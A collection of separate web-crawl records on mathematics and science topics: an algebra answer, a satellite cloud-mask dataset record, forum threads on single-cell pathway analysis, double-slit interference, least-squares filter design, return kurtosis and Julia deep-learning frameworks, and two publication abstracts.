https://www.gradesaver.com/textbooks/math/algebra/algebra-and-trigonometry-10th-edition/chapter-2-2-1-linear-equations-in-two-variables-2-1-exercises-page-170/49
## Algebra and Trigonometry 10th Edition y = -$\frac{1}{2}$x - 2 Point: [2,-3]; m = $-\frac{1}{2}$ y - (-3) = $-\frac{1}{2}$(x-2) y + 3 = $-\frac{1}{2}$ + 1 y = -$\frac{1}{2}$x - 2
2020-09-27 04:24:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.23596473038196564, "perplexity": 3148.477013009751}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400250241.72/warc/CC-MAIN-20200927023329-20200927053329-00335.warc.gz"}
https://zenodo.org/record/1460961/export/xd
Dataset Open Access # Sentinel-2 reference cloud masks generated by an active learning method Louis Baetens; Olivier Hagolle ### Dublin Core Export <?xml version='1.0' encoding='utf-8'?> <oai_dc:dc xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/ http://www.openarchives.org/OAI/2.0/oai_dc.xsd"> <dc:creator>Louis Baetens</dc:creator> <dc:creator>Olivier Hagolle</dc:creator> <dc:date>2018-10-12</dc:date> <dc:description> Reference classifications generated with Active Learning for Cloud Detection (ALCD) This data set provides a reference cloud mask data set for 38 Sentinel-2 scenes. These reference masks have been created with the ALCD tool, developed by Louis Baetens, under the direction of Olivier Hagolle at CESBIO/CNES[1]. They were created to validate the cloud masks generated by the MAJA software [2]. - The Reference_dataset directory contains 31 scenes selected in 2017 or 2018. - The Hollstein directory contains 7 scenes that were used to validate the ALCD tool by comparison to manually generated reference images kindlyprovided by Hollstein et al[3] One of these scenes is present in both directories. For the validation of MAJA, the "Hollstein" scenes were not used because of their acquisition at a time period when Sentinel-2 was not yet operational, with a degraded repetitivity of observations. # Description of the data structure The name of each scene directory is the name of the corresponding Sentinel-2 L1C product. In the scene directory, three sub-directories can be found. - Classification - Samples - Statistics # Description of the files - Classification/classification_map.tif --- the main product, which is the classified scene. 7 classes are available. Each one is represented with a different integer. 0: no_data. 1: not used. 2: low clouds. 3: high clouds. 5: land. 6: water. 7: snow. - Classification/confidence_enhanced.tif --- enhanced confidence map of the classification. The values are between 0 and 255 (coded on 1 bit). The original confidence map is, for each pixel, the proportion of votes for the majority class as the classification map has been created via a Random Forest algorithm. A median filter has been applied to this confidence map. Finally, the value was saved on 1 bit, leading to the value being between 0 and 255. - Classification/contours.png --- the contours of the classes from the classification map, overlayed on the scene. The color code depends on each class. Green: low and high clouds. Yellow: cloud shadows. Blue: water. Purple: snow. - Classification/used_parameters.json --- the parameters that were used to classify the scene. It includes the tile code, the cloudy and clear dates, along with their product reference. - Samples/ --- this directory contains all the shapefiles, one per class. - Statistics/k_fold_summary.json --- results of the 10-fold cross-validation on the scene. 5 metrics are computed, in the order given in the "metrics_names". "all_metrics" is a list of the 10 folds, with the 5 metrics in the correct order for each fold. "means" and "stds" are the means and standard deviations of the 10 folds. # References [1] Baetens, L.; Desjardins, C.; Hagolle, O. Validation of Copernicus Sentinel-2 Cloud Masks Obtained from MAJA, Sen2Cor, and FMask Processors Using Reference Cloud Masks Generated with a Supervised Active Learning Procedure. Remote Sens. 2019, 11, 433. [2] A multi-temporal method for cloud detection, applied to FORMOSAT-2, VENµS, LANDSAT and SENTINEL-2 images, O Hagolle, M Huc, D. Villa Pascual, G Dedieu, Remote Sensing of Environment 114 (8), 1747-1755, 2010 [3] Hollstein, A.; Segl, K.; Guanter, L.; Brell, M.; Enesco, M. Ready-to-Use Methods for the Detection of Clouds, Cirrus, Snow, Shadow, Water and Clear Sky Pixels in Sentinel-2 MSI Images. Remote Sens. 2016, 8, 666</dc:description> <dc:identifier>https://zenodo.org/record/1460961</dc:identifier> <dc:identifier>10.5281/zenodo.1460961</dc:identifier> <dc:identifier>oai:zenodo.org:1460961</dc:identifier> <dc:language>eng</dc:language> <dc:relation>doi:10.5281/zenodo.1460960</dc:relation> <dc:relation>url:https://zenodo.org/communities/remote-sensing</dc:relation> <dc:rights>info:eu-repo/semantics/openAccess</dc:rights> <dc:subject>Sentinel-2</dc:subject> <dc:subject>Validation</dc:subject> <dc:title>Sentinel-2 reference cloud masks generated by an active learning method</dc:title> <dc:type>info:eu-repo/semantics/other</dc:type> <dc:type>dataset</dc:type> </oai_dc:dc> 3,811 1,050 views
2022-10-04 19:57:51
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.32531052827835083, "perplexity": 10547.940234059319}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00259.warc.gz"}
https://www.biostars.org/p/294375/
pathway for single cell RNA-seq 2 2 Entering edit mode 4.9 years ago kanwarjag ★ 1.2k I have a single cell RNA-seq data form 10X genomics. I want to perform pathway analysis of top 50 genes of each cluster on the the basis of DE. These clusters represent cells with similar expression of genes. So in pathway analysis of these top 50 genes I want to identify what possible type of cells they may be. There are several types of pathway analysis- like IPA, Enrichr, David and so on. Any suggestion which tool will be the the best to at least suggest that clustered cells are of a particular cell type and has a specific pathways enriched in them. e.g if Stem cell pathway is enriched we may say that these are pluripotent cells. Any suggestion? pathway • 7.6k views 1 Entering edit mode Did you get the fastq files? assuming that you do. From the single cell RNA-Seq Data to a pathway analysis is quite a path...way. A suggestion is to you look at https://pachterlab.github.io/kallisto/singlecell.html and http://satijalab.org/seurat/get_started.html 0 Entering edit mode I have already analyzed the data and has top differentially expressed genes specific for each cluster. Instead of using known markers I want to use enrichment/ pathway analysis that what type of cells are in each cluster. Apology If my original question was not explained clearly. 0 Entering edit mode Please use ADD COMMENT/ADD REPLY when responding to existing posts to keep threads logically organized. 0 Entering edit mode Biologists around here seem to like IPA, but I haven't tried it myself. 1 Entering edit mode 4.9 years ago tiago211287 ★ 1.4k There are many ways of doing enrichment analysis. I usually like the TopGO package because it let me construct my background. 1 Entering edit mode 4.9 years ago igor 13k If you only take the top 50 genes, you might be missing a lot of information. Also, depending on what the other clusters are, the differentially expressed genes will change. You can take the average expression of all genes for each cluster and then use a cell type deconvolution tool. Check this previous discussion where there are a few great suggestions: Deconvolution Methods on RNA-Seq Data (Mixed cell types)
2022-11-27 19:45:41
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3188023567199707, "perplexity": 2653.800207302041}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710417.25/warc/CC-MAIN-20221127173917-20221127203917-00499.warc.gz"}
https://www.physicsforums.com/threads/two-source-interference-determining-wavelength.601905/
# Homework Help: Two source interference determining wavelength 1. Apr 30, 2012 ### Alchemist90 1. The problem statement, all variables and given/known data A laser with wavelength d/8 is shining light on a double slit with slit separation 0.300 . This results in an interference pattern on a screen a distance L away from the slits. We wish to shine a second laser, with a different wavelength, through the same slits. What is the wavelength λ2 of the second laser that would place its second maximum at the same location as the fourth minimum of the first laser, if d= 0.300 ? 2. Relevant equations dsinθ=mλ dsinθ=(m+1/2)λ d=3*10-4m 3. The attempt at a solution sinθ=((m+1/2)λ1)/d where m=-4 sinθ=((m+1/2)λ2)/d where m= 2 set equal and i got -0.0525mm. im not sure where I'm misunderstanding but it could be my understanding of m values, reading the problem wrong or simply a misunderstanding of the whole question posed. Any takers? Last edited: Apr 30, 2012 2. Apr 30, 2012 ### Alucinor Check your equations for maxima location versus minima location, there is a small difference between the two that might help you solve your problem. You're trying to put a minimum where a maximum should be, however in your attempt you're working only with maxima. You also want to be sure you don't end up with that sign error, there is a symmetry that you should be looking for that makes all of those m's positive. Also, be careful with your units, you're saying d=0.300 (whats?) 3. Apr 30, 2012 ### Alchemist90 yea I've gotten closer. d=0.3mm (millimeter) oh and i was being stupid about m values since m starts at m=0 its max at m=1 and min at m=3 now i tried dsinθ=(3+1/2)λ1 where λ1=d/8 then sub in for dsinθ=λ2 thus I get (3.5/8)d=λ2 which gives 0.13125mm but thats not right either. Last edited: Apr 30, 2012 4. Apr 30, 2012 ### Alucinor You're still saying that the "4th minimum" is a maximum in your equation. $$dsin\theta=\left(m+\frac{1}{2}\right)\lambda$$ is a maximum location. 5. Apr 30, 2012 ### Alchemist90 That is the condition for single slit light diffraction where dsinθ=mλ is a local minimum. This is double slit diffraction. where maximum locations are dsinθ=mλ where m=0,1,2,3......etc minimum locations are dsinθ=(m+1/2) where m=0,1,2,3.....etc 6. Apr 30, 2012 ### Alchemist90 dsinθ=mλ is a maximum where m=1,2,3....etc <----- watch for this dsinθ=(1+1/2)λ is a minimum where m=0,1,2,3.....etc Don't make my mistakes. Replier: don't listen to him he's wrong. 7. Apr 30, 2012 ### Alucinor Oh goodness, my mistake. I was reading it as a single slit.
2018-08-18 12:58:54
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.441878080368042, "perplexity": 2609.2886245908594}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221213666.61/warc/CC-MAIN-20180818114957-20180818134957-00496.warc.gz"}
https://dsp.stackexchange.com/questions/66356/least-squares-filter-design-deriving-the-objective-function
Least Squares Filter Design: Deriving the Objective Function I'm following the derivation in this paper A Comb Filter Design Using Fractional-Sample Delay to obtain the objective function for the least-squares filter design. N-order FIR filter: $$H(z) = \sum_{n=0}^N h(n)z^{-n}$$ Frequency response: $$H(\omega) = \mathbf{h}^T\mathbf{e}(\omega) = \mathbf{e}^T(\omega)\mathbf{h}$$ where $$\mathbf{h}=[h(0)\quad h(1) \quad\dots \quad h(N)]$$ and $$\mathbf{e}=[1\quad e^{-j\omega} \quad\dots \quad e^{-jN\omega}]$$ Least squares error: $$J(h)=\int_{\omega \in R^+\cup R^-} |H(\omega)-F_d(\omega)|^2 d\omega$$ where $$R^+=[0,\alpha\omega]$$ and $$R^-=[-\alpha\omega,0]$$ Which is rewritten in the quadratic form: $$J(h) =h^TQh - 2h^Tp + c$$ $$Q$$, $$p$$, and $$c$$ are given in the paper as follows: $$F_d(\omega)= e^{-jD\omega}$$ and $$h(n)$$ is real. I've been having trouble with getting these expressions for the Q matrix and p vector. How can I obtain them? $$J(h) = \int_{R^+UR-}|e^Th-F_d|^2d\omega\tag{1}\\ = \int(e^Th-F_d)^H(e^Th-F_d)d\omega\\ = \int((e^Th)^H(e^Th) + F_d^HF_d -(e^Th)^HF_d - F_d^He^Th)d\omega\\ = h^H(\int(e^T)^He^Td\omega) h + \int |F_d|^2d\omega -\int (2 Re\{(e^Th)^HF_d\})d\omega$$ The second term in above integral is the integral of $$L_2$$ norm of $$F_d$$ in the region $$R^+ U R^-$$. Since $$F_d(\omega)$$ is symmetric about $$\omega = 0$$, this integral will be $$2 \times \int_{R^+}|F_d(\omega)|^2d\omega$$ which is $$c$$ in your questions. The first term, the argument inside integral is the outer product of column vector $$(e^H)^T$$ with row vector $$e^T$$. Again, this will conjugate of each for the regions $$R^+$$ and $$R^-$$ (shown later in the appendix). So integral over both regions will result in the real value of integral $$e^H e$$. Also, since $$H$$ is real, $$h^H=h^T$$. So the first term can be rewritten as (for simplicity dropping $$T$$ notation as it is assumed to be a column vector) $$h^T(\int_{R^+}2Re\{ ee^H\}d\omega )h\\ = h^TQh$$ The third term is the result of sum of 2 conjugate terms. Again this is symmetric about $$\omega=0$$. Also, since $$H$$ is real, $$h^H=h^T$$. Taking out $$2h^T$$ from the integral we have $$2h^T\int_{R+}2Re\{F_de^H \}d\omega = 2h^Tp$$ Therefore, summing and rearranging the 3 terms, $$J(h) = h^TQh - 2h^Tp + c$$ Appendix: Showing that $$ee^H$$ is conjugate of each other in $$R^+$$ and $$R^-$$. $$E_{mn}$$, element of $$ee^H$$ is $$e^{-jm\omega}e^{-jn\omega} = e^{-j(m+n)\omega}$$. In $$R^-$$, this element is $$e^{j(m+n)\omega}$$ which is $$E_{mn}^*$$
2021-09-18 08:50:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 45, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9778974652290344, "perplexity": 188.79226790255328}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780056348.59/warc/CC-MAIN-20210918062845-20210918092845-00481.warc.gz"}
https://quant.stackexchange.com/questions/22068/high-values-of-skewness-and-kurtosis-of-realized-protfolio-returns
# High values of skewness and kurtosis of realized protfolio returns I am investigating some asset allocation strategies and I am wondering about the results I obtain. I am working on monthly and weekly data of the same stock indices (SP500, FTSE 100 etc). And when I compute the summary statistics of the realized returns I observe that for the very same strategy those statistics vary greatly between weekly and monthly data. For the monthly f.e. I obtain skewness = 0.4 and kurtosis = 5, while for the weekly frequency skewness = 1.5 and kurtosis = 25. Are the results for the weekly data plausible? And is it possible that the difference in the frequency of data results in such differences in the summary statistics? All computations are identical, the only difference is the data frequency. I hope the question is not too general and it is possible to give some insight based on my description. • Hard to say what is plausible without knowing your strategies but skewness and kurtosis tend to their normal values under temporal aggregation. – Bob Jansen Dec 2 '15 at 21:52 • hum....that's sounds a bit dodgyfor vanilla indexes although some differences are expected but not that huge (focusing on the kurtosis side). Please make me a favor by re-checking your weekly return series to see if there are no outliers, errors there. Alternatively specify your time horizon... As a matter of fact got 6.559... (weekly) for spx from jan-99 til nov-15 vs 10.63..(weekly) for ukx from jan-98 til nov-15. hope you understand more about my reluctance here. Please quickly use Excel kurt() on your data and keep me posted as I am curious. – owner Dec 2 '15 at 22:03 • @owner I am solving the asset allocation problem on excess returns and the values of kurtosis for spx is 6.66 and for ftse 7.72. The values for non-excess returns are very similar. And I think there are no mistakes in the data, I have not omitted any outliers, as research on which I base mine didn't omit any either. The most intriguing thing is the difference between monthly and weekly data, as the computation process is the same in both cases, only the data changes. – Masher Dec 2 '15 at 22:30 • @Masher: fair enough... I had seen such a big gap in the past on an academic paper focusing on intra-day calculations vs other frequencies on fx markets, and am fine to discover something unexpected a priori from your asset allocation problem. – owner Dec 2 '15 at 22:46 • @owner do you remember the paper which you have mentioned? It would be great to show that such a case did not only happen in my research but in other works too. I am still wondering how is it possible, since there are no indications in the data or the calculations that the results would be so extreme in case of the weekly data. – Masher Dec 2 '15 at 22:54
2019-07-16 20:24:38
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.38414308428764343, "perplexity": 1168.9796839819387}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195524879.8/warc/CC-MAIN-20190716201412-20190716223412-00067.warc.gz"}
https://zbmath.org/?q=an%3A0843.62037
## Density estimation under long-range dependence.(English)Zbl 0843.62037 Summary: H. Dehling and M. S. Taqqu [Stat. Probab. Lett. 7, No. 1, 81-85 (1988; Zbl 0666.60031)] established the weak convergence of the empirical process for a long-range dependent stationary sequence under Gaussian subordination. We show that the corresponding density process, based on kernel estimators of the marginal density, converges weakly with the same normalization to the derivative of the limiting process. The phenomenon, which carries on for higher derivatives and for functional laws of the iterated logarithm, is in contrast with independent or weakly dependent situations, where the density process cannot be tight in the usual function spaces with supremum distances. ### MSC: 62G07 Density estimation 62M99 Inference from stochastic processes 62G20 Asymptotic properties of nonparametric inference 60F17 Functional limit theorems; invariance principles Zbl 0666.60031 Full Text:
2022-09-29 01:18:35
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8105507493019104, "perplexity": 1320.7892795489706}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335303.67/warc/CC-MAIN-20220929003121-20220929033121-00037.warc.gz"}
http://www.math.u-szeged.hu/Bolyai/hppublikacio.phtml?id=28&pid=1971&auto=on
# Kérchy László honlapja ### Publikációs lista Vissza. Cím: A description of invariant subspaces of $C\sb{11}$-contractions. Szerzõ: K\'erchy, L. Forrás: J. Oper. Theory 15, 327-344 (1986). Nyelv: English Absztrakt: B.Sz.-Nagy and C. Foia\c{s} have given a description of invariant subspaces of completely nonunitary contractions in terms of regular factorizations of their characteristic function. Since it is rather difficult to look over all regular factorizations of a contractive analytic function even in the simplest cases {\it S. O. Sickler} [Indiana Univ. Math. J. 24, 635-650 (1975; Zbl 0374.47002)] initiated to derive more explicit descriptions of invariant subspaces. His result concerns $C\sb{11}$-contractions with scalar-valued characteristic function, and has been generalized by {\it P. Y. Wu} [J. Oper. Theory 1, 261-272 (1979; Zbl 0431.47007)] to $C\sb{11}$-contractions with a finite matrix characteristic function. Extending these investigations the present paper provides a characterization of the hyperinvariant subspaces of arbitrary $C\sb{11}$-contractions, describes the biinvariant subspaces of $C\sb{11}$-contractions which are weakly similar to unitaries, and gives a description of all invariant subspaces of those contractions whose characteristic function has a scalar multiple. These results are achieved by studying the connection of a $C\sb{11}$-contraction to the attached canonical unitary operator. Letöltés: | Zentralblatt
2015-04-27 07:10:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9001510739326477, "perplexity": 1245.9267386927577}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1429246657588.53/warc/CC-MAIN-20150417045737-00136-ip-10-235-10-82.ec2.internal.warc.gz"}
https://discourse.julialang.org/t/julia-end-to-end-lstm-for-one-cpu/3942
# Julia end-to-end LSTM for one CPU #1 I wonder how this core would look like in Julia Together with a Julia frontend How do I build a Julia abstraction for all of this, integrated with JuliaDB? The GPU part would not be a priority at the moment, as I first want to run an LSTM on a macOS CPU. How do I take the first 100 steps? #2 Are you asking about writing your own backend in Julia or wrapping TensorFlow’s backend? Why would you do any of these when TensorFlow.jl and Knet.jl exist? #3 Christopher Rackauckas @ChrisRackauckas 16:50 on https://gitter.im/JuliaML/chat Knet doesn’t use computational graphs. It uses dispatch on the types in generic Julia code and overloads the methods using their specific array type in order to turn your NN code into GPU code. Take a look at the tutorial, and note that it’s essentially just Julia code with two lines from KNet.jl: one call to Autograd.jl and many calls to create KNet arrays. By making it a KNet array instead of an Array, it then overloads what * etc. all mean to make your Julia NN code run on the GPU and all of that, but that means that the tutorial is essentially just a “how to write an NN in Julia” Mike Innes: Building a graph has genuine benefits – e.g. parallelism, deployment, fusing operations and memory management. PyTorch and Knet will both struggle with those. Of course, it’s also true that TensorFlow’s API is severely limited by Python This might be a starting point for a great discourse https://www.tensorflow.org/extend/architecture #4 Isn’t the core of TensorFlow all C++ code (with a C API that makes it easier to interface with)? Python is just one of the two languages they concentrated on for the client libraries (along with C++). #5 TensorFlow.jl is exactly the attempt to make a Julian API for TensorFlow. #6 Does TensorFlow.jl wrap Python? #7 Essentially, TensorFlow provides 3 main advantages: 1. Automated differentiation. 2. Code generation for CPU and GPU. 3. Distributed computations. I don’t know much about TF’s model of distributed computations, so can’t really comment on this. I wrote specifically automated differentiation because in TF it’s not exactly the same as automatic differentiation e.g. in Knet.jl. Citing @denizyuret: Automatic differentiation is the idea of using symbolic derivatives only at the level of elementary operations, and computing the gradient of a compound function by applying the chain rule to intermediate numerical results. For example, pure symbolic differentiation of \sin^2(x) could give us 2\sin(x)\cos(x) directly. Automatic differentiation would use the intermediate numerical values x_1=\sin(x), x_2=x_1^2 and the elementary derivatives dx_2/dx_1=2x_1, dx_1/dx=\cos(x) to compute the same answer without ever building a full gradient expression. AD is pretty good, actually, especially being backed by GPU arrays. Yet, as you mentioned, it doesn’t create a computational graph which limits many optimizations. An alternative approach is to use symbolic differentiation. SD is less straightforward to implement and has its own limitations (e.g. no loops on loss function), but it can produce exactly what AD is missing - computational graph (for which we already have Julia’s AST). To my knowledge, there are currently 2 packages providing symbolic differentiation on array types - ReverseDiffSource.jl by Frédéric Testard and mine XDiff.jl. Both are not in the best shape (ReverseDiffSource doesn’t support Julia 0.6 yet, XDiff.jl is currently under the major refactoring), but if you are looking for symbolic computational graphs like in TensorFlow helping one of these projects may be a good start. Code generation comes from symbolic graphs and shouldn’t be too hard (especially given awesome CUDANative.jl), yet making it produce really highly optimized code may take many man-hours, and this is exactly where TF has the advantage over not-so-well-known projects. I can dive deeper into the details of (1) and (2) if you really want to step this way, but you should be aware that this way is quite long yet. #8 I just want the most correct way for Julia, without rushing. #9 I understand it doesn’t but is there something to be said if the backend was made with a Python frontend in mind? In the end I just want to assume I don’t want C++ or Python in the design. #10 TensorFlow.jl wraps the TensorFlow core (mostly C++), not the Python frontend. If you want a pure Julia deep learning framework, check out Knet.jl. #11 If you scroll up you’ll see from Chris’ comment that Knet doesn’t use computational graphs. #12 Rather than ask that question here, why don’t you look at the source code instead? #13 https://github.com/JuliaDiff/ReverseDiff.jl builds up a computational graph for automatic differentiation (in reverse mode). #14 I looked at the docs, it was sufficient. #15 So that’s one other decision to make: which type of differentiation to use for the computational graph. #16 It is good and fun to talk about different design strategies sometimes but it is important to note that you get experience and insight when you actually implement things. You have had your package https://github.com/hpoit/MLN.jl/ going for 10 months now and it has links to tutorials and documentation and release notes. These, as well as all the Julia files, are still after hundreds of commit completely empty. At some point you have to get dirty and actually try write some code instead of just discussing it. Remember that when you ask question you other people spend their time to answer them in order to help you. I think it would be fair that next time you could add a bit of actual runnable Julia code that shows what you have tried so far. That would make it easier to see where you are and how to progress from what you have implemented so far. #17 I like to ponder before doing anything. For example, it seems like Julia was very well pondered before it was initiated. I’m on the paper stage, which I believe comes before the doing stage. #18 Julia is not done and I would not say it was very well pondered… Like everything in Julia is changing all the time. The file extension was changed once, the names for the basic types just got changed, the type system gets revamped, function types gets added etc etc. Julia is the result of an incredible amount of work where bad ideas have been scrapped and good ideas have been kept and the only way to know if many of them were good or not was by trying them. Yes, it is useful to ponder on things sometime but at some point there has to be some action too. #19 Initiated, not finished or completed, is what I meant. I like action, in the right amount. #20 I guess you are talking about the tape which indeed is a kind of computational graph. However, it’s different from what you typically get with symbolic differentiation. The key difference is whether you can further transform the graph, e.g. fuse operations, find common subexpression, generate code, etc. Consider following example: u::Vector{Float32} v::Vector{Float32} x = u + v y = 2x z = sum(y) in symbolic differentiation you get something like: dz_dz = 1.0 dz_dy = dz_dx * ones(size(u)) dz_dx = dz_dy * 2 dz_dv = dz_dx * 1 dz_du = dz_dx * 1 which is easily simplified to: dz_dz = 1.0 dz_dy = ones(size(u)) dz_dx = 2 * dz_dy dz_dv = dz_dx dz_du = dz_dx if you only need derivatives w.r.t. inputs u and v, you can throw away unused variables and get: dz_dv = fill(2, size(u)) dz_du = dz_dv Generating code for GPU or, for example, dstributed calculaton on the cluster is also trivial. ReverseDiff.jl, on the other hand, provides an exact implementation for each of recorded instructions and their derivatives, binding them to the tape and cache. Optimizing the tape looks pretty hard to me (I also didn’t find any such optimizations in the code) and moving the code to GPU will probably require a special kind of GPU tape.
2019-02-17 23:53:42
